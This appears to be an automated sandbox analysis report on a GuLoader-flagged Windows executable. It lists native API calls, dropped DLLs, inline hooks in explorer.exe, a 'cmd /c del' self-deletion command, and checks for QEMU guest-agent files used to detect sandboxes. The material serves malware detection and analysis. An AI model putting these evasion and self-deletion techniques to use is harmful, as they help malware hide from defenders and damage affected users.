        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046B59C014_2_046B59C0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0468FAA014_2_0468FAA0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0472FA8914_2_0472FA89
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0472FB2E14_2_0472FB2E
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046ADB1914_2_046ADB19
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0054E7C614_2_0054E7C6
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00532D9014_2_00532D90
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00532D8714_2_00532D87
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00539E5014_2_00539E50
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00539E4F14_2_00539E4F
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00532FB014_2_00532FB0
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: String function: 1D7BE692 appears 85 times
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: String function: 1D73B910 appears 272 times
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: String function: 1D785050 appears 37 times
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: String function: 1D7CEF10 appears 105 times
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: String function: 1D797BE4 appears 98 times
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 046A5050 appears 37 times
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 046DE692 appears 85 times
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 046B7BE4 appears 98 times
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 046EEF10 appears 105 times
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 0465B910 appears 272 times
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D782D10 NtQuerySystemInformation,LdrInitializeThunk,7_2_1D782D10
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D782DC0 NtAdjustPrivilegesToken,LdrInitializeThunk,7_2_1D782DC0
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D782DA0 NtReadVirtualMemory,LdrInitializeThunk,7_2_1D782DA0
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D782C50 NtUnmapViewOfSection,LdrInitializeThunk,7_2_1D782C50
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D782C30 NtMapViewOfSection,LdrInitializeThunk,7_2_1D782C30
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D782CF0 NtDelayExecution,LdrInitializeThunk,7_2_1D782CF0
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D782F00 NtCreateFile,LdrInitializeThunk,7_2_1D782F00
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D782E50 NtCreateSection,LdrInitializeThunk,7_2_1D782E50
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D782ED0 NtResumeThread,LdrInitializeThunk,7_2_1D782ED0
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D782EB0 NtProtectVirtualMemory,LdrInitializeThunk,7_2_1D782EB0
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7829F0 NtReadFile,LdrInitializeThunk,7_2_1D7829F0
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D782B10 NtAllocateVirtualMemory,LdrInitializeThunk,7_2_1D782B10
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D782BC0 NtQueryInformationToken,LdrInitializeThunk,7_2_1D782BC0
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D782B90 NtFreeVirtualMemory,LdrInitializeThunk,7_2_1D782B90
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D782A80 NtClose,LdrInitializeThunk,7_2_1D782A80
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D783C30 NtOpenProcessToken,7_2_1D783C30
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D783C90 NtOpenThread,7_2_1D783C90
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7838D0 NtGetContextThread,7_2_1D7838D0
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7834E0 NtCreateMutant,7_2_1D7834E0
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D782D50 NtWriteVirtualMemory,7_2_1D782D50
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D782C20 NtSetInformationFile,7_2_1D782C20
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D782C10 NtOpenProcess,7_2_1D782C10
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D782CD0 NtEnumerateKey,7_2_1D782CD0
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D782F30 NtOpenDirectoryObject,7_2_1D782F30
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D782FB0 NtSetValueKey,7_2_1D782FB0
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D782E00 NtQueueApcThread,7_2_1D782E00
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D782EC0 NtQuerySection,7_2_1D782EC0
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D782E80 NtCreateProcessEx,7_2_1D782E80
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7829D0 NtWaitForSingleObject,7_2_1D7829D0
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D782B20 NtQueryInformationProcess,7_2_1D782B20
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D782B00 NtQueryValueKey,7_2_1D782B00
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D782BE0 NtQueryVirtualMemory,7_2_1D782BE0
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D782B80 NtCreateKey,7_2_1D782B80
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D782A10 NtWriteFile,7_2_1D782A10
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D782AC0 NtEnumerateValueKey,7_2_1D782AC0
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D782AA0 NtQueryInformationFile,7_2_1D782AA0
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D784570 NtSuspendThread,7_2_1D784570
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D784260 NtSetContextThread,7_2_1D784260
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046A2C30 NtMapViewOfSection,LdrInitializeThunk,14_2_046A2C30
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046A2CF0 NtDelayExecution,LdrInitializeThunk,14_2_046A2CF0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046A2D10 NtQuerySystemInformation,LdrInitializeThunk,14_2_046A2D10
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046A2DC0 NtAdjustPrivilegesToken,LdrInitializeThunk,14_2_046A2DC0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046A2E50 NtCreateSection,LdrInitializeThunk,14_2_046A2E50
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046A2F00 NtCreateFile,LdrInitializeThunk,14_2_046A2F00
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046A29F0 NtReadFile,LdrInitializeThunk,14_2_046A29F0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046A2A80 NtClose,LdrInitializeThunk,14_2_046A2A80
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046A2B00 NtQueryValueKey,LdrInitializeThunk,14_2_046A2B00
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046A2B10 NtAllocateVirtualMemory,LdrInitializeThunk,14_2_046A2B10
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046A2BC0 NtQueryInformationToken,LdrInitializeThunk,14_2_046A2BC0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046A2B80 NtCreateKey,LdrInitializeThunk,14_2_046A2B80
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046A2B90 NtFreeVirtualMemory,LdrInitializeThunk,14_2_046A2B90
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046A34E0 NtCreateMutant,LdrInitializeThunk,14_2_046A34E0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046A4570 NtSuspendThread,14_2_046A4570
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046A4260 NtSetContextThread,14_2_046A4260
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046A2C50 NtUnmapViewOfSection,14_2_046A2C50
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046A2C20 NtSetInformationFile,14_2_046A2C20
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046A2C10 NtOpenProcess,14_2_046A2C10
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046A2CD0 NtEnumerateKey,14_2_046A2CD0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046A2D50 NtWriteVirtualMemory,14_2_046A2D50
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046A2DA0 NtReadVirtualMemory,14_2_046A2DA0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046A2E00 NtQueueApcThread,14_2_046A2E00
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046A2EC0 NtQuerySection,14_2_046A2EC0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046A2ED0 NtResumeThread,14_2_046A2ED0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046A2EB0 NtProtectVirtualMemory,14_2_046A2EB0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046A2E80 NtCreateProcessEx,14_2_046A2E80
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046A2F30 NtOpenDirectoryObject,14_2_046A2F30
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046A2FB0 NtSetValueKey,14_2_046A2FB0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046A29D0 NtWaitForSingleObject,14_2_046A29D0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046A2A10 NtWriteFile,14_2_046A2A10
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046A2AC0 NtEnumerateValueKey,14_2_046A2AC0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046A2AA0 NtQueryInformationFile,14_2_046A2AA0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046A2B20 NtQueryInformationProcess,14_2_046A2B20
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046A2BE0 NtQueryVirtualMemory,14_2_046A2BE0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046A3C30 NtOpenProcessToken,14_2_046A3C30
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046A3C90 NtOpenThread,14_2_046A3C90
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046A38D0 NtGetContextThread,14_2_046A38D0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0054A350 NtCreateFile,14_2_0054A350
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0054A400 NtReadFile,14_2_0054A400
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0054A480 NtClose,14_2_0054A480
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0054A530 NtAllocateVirtualMemory,14_2_0054A530
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0054A3FA NtReadFile,14_2_0054A3FA
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0054A47A NtClose,14_2_0054A47A
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0054A52A NtAllocateVirtualMemory,14_2_0054A52A
        Source: aSsc9zh1ex.exe, 00000001.00000002.41961843116.0000000000788000.00000004.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamewxbase30u_xml_gcc_custom.dll4 vs aSsc9zh1ex.exe
        Source: aSsc9zh1ex.exe, 00000007.00000002.42241457074.000000000012C000.00000040.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameRUNDLL32.EXEj% vs aSsc9zh1ex.exe
        Source: aSsc9zh1ex.exe, 00000007.00000003.42237840723.0000000001B3B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRUNDLL32.EXEj% vs aSsc9zh1ex.exe
        Source: aSsc9zh1ex.exe, 00000007.00000003.42236234869.0000000001B3B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRUNDLL32.EXEj% vs aSsc9zh1ex.exe
        Source: aSsc9zh1ex.exe, 00000007.00000003.41891750806.000000001D4CE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs aSsc9zh1ex.exe
        Source: aSsc9zh1ex.exe, 00000007.00000003.41897036006.000000001D68A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs aSsc9zh1ex.exe
        Source: aSsc9zh1ex.exe, 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs aSsc9zh1ex.exe
        Source: aSsc9zh1ex.exe, 00000007.00000002.42271876299.000000001D9E0000.00000040.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs aSsc9zh1ex.exe
        Source: aSsc9zh1ex.exe, 00000007.00000003.42235969161.0000000001B24000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRUNDLL32.EXEj% vs aSsc9zh1ex.exe
        Source: aSsc9zh1ex.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeSection loaded: edgegdi.dllJump to behavior
        Source: wxbase30u_xml_gcc_custom.dll.1.drStatic PE information: Number of sections : 12 > 10
        Source: aSsc9zh1ex.exeVirustotal: Detection: 37%
        Source: aSsc9zh1ex.exeMetadefender: Detection: 14%
        Source: aSsc9zh1ex.exeReversingLabs: Detection: 34%
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeFile read: C:\Users\user\Desktop\aSsc9zh1ex.exeJump to behavior
        Source: aSsc9zh1ex.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\aSsc9zh1ex.exe "C:\Users\user\Desktop\aSsc9zh1ex.exe"
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeProcess created: C:\Users\user\Desktop\aSsc9zh1ex.exe "C:\Users\user\Desktop\aSsc9zh1ex.exe"
        Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
        Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\aSsc9zh1ex.exe"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeProcess created: C:\Users\user\Desktop\aSsc9zh1ex.exe "C:\Users\user\Desktop\aSsc9zh1ex.exe" Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\aSsc9zh1ex.exe"Jump to behavior
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 1_2_0040350A EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,1_2_0040350A
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeFile created: C:\Users\user\AppData\Local\Temp\nsi8952.tmpJump to behavior
        Source: classification engineClassification label: mal100.troj.evad.winEXE@7/8@29/7
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 1_2_004021AA CoCreateInstance,1_2_004021AA
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 1_2_00404967 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,1_2_00404967
        Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1704:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1704:304:WilStaging_02
        Source: aSsc9zh1ex.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
        Source: Binary string: D:\SourceCode\GC3.UserExperienceImprovement\production_V4.2\Service\ServiceSDK\Release\UserExperienceImprovementPlugin\AsSQLHelper.pdb source: AsSQLHelper.dll.1.dr
        Source: Binary string: D:\SourceCode\GC3.Overclocking\production_V4.2\Service\ServiceSDK\Release\ThrottlePlugin\AEGISIIINVHelper.pdb source: AEGISIIINVHelper.dll.1.dr
        Source: Binary string: mshtml.pdb source: aSsc9zh1ex.exe, 00000007.00000001.41771865753.0000000000649000.00000008.00000001.01000000.00000005.sdmp
        Source: Binary string: wntdll.pdbUGP source: aSsc9zh1ex.exe, 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, aSsc9zh1ex.exe, 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmp, aSsc9zh1ex.exe, 00000007.00000003.41895267490.000000001D55D000.00000004.00000800.00020000.00000000.sdmp, aSsc9zh1ex.exe, 00000007.00000003.41890350295.000000001D3AB000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000E.00000002.46597015234.0000000004630000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000E.00000002.46598617153.000000000475D000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000E.00000003.42246206237.0000000004483000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000E.00000003.42240222700.00000000042D2000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: aSsc9zh1ex.exe, aSsc9zh1ex.exe, 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, aSsc9zh1ex.exe, 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmp, aSsc9zh1ex.exe, 00000007.00000003.41895267490.000000001D55D000.00000004.00000800.00020000.00000000.sdmp, aSsc9zh1ex.exe, 00000007.00000003.41890350295.000000001D3AB000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, rundll32.exe, 0000000E.00000002.46597015234.0000000004630000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000E.00000002.46598617153.000000000475D000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000E.00000003.42246206237.0000000004483000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000E.00000003.42240222700.00000000042D2000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: rundll32.pdb source: aSsc9zh1ex.exe, 00000007.00000003.42237635887.0000000001B32000.00000004.00000020.00020000.00000000.sdmp, aSsc9zh1ex.exe, 00000007.00000002.42241289508.0000000000120000.00000040.10000000.00040000.00000000.sdmp, aSsc9zh1ex.exe, 00000007.00000003.42235969161.0000000001B24000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: rundll32.pdbGCTL source: aSsc9zh1ex.exe, 00000007.00000003.42237635887.0000000001B32000.00000004.00000020.00020000.00000000.sdmp, aSsc9zh1ex.exe, 00000007.00000002.42241289508.0000000000120000.00000040.10000000.00040000.00000000.sdmp, aSsc9zh1ex.exe, 00000007.00000003.42235969161.0000000001B24000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: mshtml.pdbUGP source: aSsc9zh1ex.exe, 00000007.00000001.41771865753.0000000000649000.00000008.00000001.01000000.00000005.sdmp

        Data Obfuscation

        barindex
        Yara detected GuLoader
        Source: Yara matchFile source: 00000007.00000000.41769049306.0000000001660000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000001.00000002.41964484846.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 1_2_6F0030C0 push eax; ret 1_2_6F0030EE
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D7408CD push ecx; mov dword ptr [esp], ecx7_2_1D7408D6
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_046608CD push ecx; mov dword ptr [esp], ecx14_2_046608D6
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0053E287 push B364374Eh; iretd 14_2_0053E2E0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0054D4F2 push eax; ret 14_2_0054D4F8
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0054D4FB push eax; ret 14_2_0054D562
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0054D4A5 push eax; ret 14_2_0054D4F8
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0054D55C push eax; ret 14_2_0054D562
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0054681F push esp; ret 14_2_00546834
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0054E90F push esp; ret 14_2_0054E916
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00546AEE push esi; ret 14_2_00546AEF
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00547B37 push cs; ret 14_2_00547B39
        Source: wxbase30u_xml_gcc_custom.dll.1.drStatic PE information: section name: .xdata
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 1_2_6F001BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,1_2_6F001BFF
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeFile created: C:\Users\user\AppData\Local\Temp\nso8B47.tmp\System.dllJump to dropped file
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeFile created: C:\Users\user\AppData\Local\Temp\wxbase30u_xml_gcc_custom.dllJump to dropped file
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeFile created: C:\Users\user\AppData\Local\Temp\AsSQLHelper.dllJump to dropped file
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeFile created: C:\Users\user\AppData\Local\Temp\AEGISIIINVHelper.dllJump to dropped file

        Hooking and other Techniques for Hiding and Protection

        barindex
        Modifies the prolog of user mode functions (user mode inline hooks)
        Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8D 0xDE 0xED
        Self deletion via cmd delete
        Source: C:\Windows\SysWOW64\rundll32.exeProcess created: /c del "C:\Users\user\Desktop\aSsc9zh1ex.exe"
        Source: C:\Windows\SysWOW64\rundll32.exeProcess created: /c del "C:\Users\user\Desktop\aSsc9zh1ex.exe"Jump to behavior
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

        Malware Analysis System Evasion

        barindex
        Tries to detect Any.run
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
        Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
        Source: aSsc9zh1ex.exe, 00000001.00000002.41964793093.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: NTDLLUSER32KERNEL32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 10.0; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSHTML.DLL
        Source: aSsc9zh1ex.exe, 00000001.00000002.41964793093.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
        Source: C:\Windows\explorer.exe TID: 6284Thread sleep count: 187 > 30Jump to behavior
        Source: C:\Windows\explorer.exe TID: 6284Thread sleep time: -374000s >= -30000sJump to behavior
        Source: C:\Windows\explorer.exeLast function: Thread delayed
        Source: C:\Windows\explorer.exeLast function: Thread delayed
        Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
        Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wxbase30u_xml_gcc_custom.dllJump to dropped file
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\AsSQLHelper.dllJump to dropped file
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\AEGISIIINVHelper.dllJump to dropped file
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 7_2_1D77FD40 rdtsc 7_2_1D77FD40
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeAPI coverage: 1.0 %
        Source: C:\Windows\SysWOW64\rundll32.exeAPI coverage: 2.0 %
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 1_2_00406850 FindFirstFileW,FindClose,1_2_00406850
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 1_2_00405C26 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,1_2_00405C26
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeCode function: 1_2_0040290B FindFirstFileW,1_2_0040290B
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeSystem information queried: ModuleInformationJump to behavior
        Source: C:\Users\user\Desktop\aSsc9zh1ex.exeAPI call chain: ExitProcess graph end nodegraph_1-4802
